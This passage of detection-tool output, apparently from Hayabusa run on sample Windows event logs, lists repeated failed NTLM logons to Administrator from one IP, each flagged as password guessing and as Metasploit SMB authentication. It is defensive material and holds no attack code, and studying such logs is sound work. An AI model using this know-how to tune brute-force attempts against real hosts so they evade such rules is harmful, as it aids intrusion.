Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQlF8GYIeWytFLsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dj48ftx52s1HntRT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B46vTS9PxUgUblBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoIFbywJEC0QaceV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSXqaP0i1eeKQOmX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gke4vfzIAC3k0yXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZnjxfeIX4ra6vmBA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ChR30FLLOT3Pvapv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VkepVf00vkpVp9yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5i2AxYxwCX6DvP3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8Fvcw2mQBI61mxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAazyOpBig2G3Z78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1g3rjPQQAXEK2yz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BC68zrAEF6L00xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8xD2aZArxVdrO6fG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHJN2mJgwQEZhXBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: untyxmsmYrfRlHcu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eOc2R5V6p9VBsYI2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5Ld2NDMjbY3tiT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ykdbglaCU82nRvk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tDGrsVIC5qVEwC6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UouNQa3EkcsMICiO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u0exIftdu0qPLrRC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q5mMNIdJj0BItrv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb2cVBffdBlwwGQP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p2FbHoSFFdnM4wH7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RAbCN4xKDDlhmrkU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxBwuSDdNZlE2F96 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M3JkwIQF7yV42rOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6QiHHeHeY8yWOiJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rhzpo2bEgpJCB51w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuyPyMMT4wQhLIEz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no5bOZf3SEsrETun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBTHVleOipnyVFIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JNFE2jNifGI7pELk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LgkAKJ57rYqCdbew : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daKQcllU63lW4ypy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBSPSAoEBS7JRYuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94bI5pb8CGjY3QZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1obedLuMFlHlSvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EPn1yJV358YAFALV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qA7N5DMAJqNYkumM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Lk95NYGG5iLBFBw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3DDtXECsK61pIYy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rt8bfBDTV5wYfBO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uTYMgN5kmFpyj7xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmyF6j61wosCE0sg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 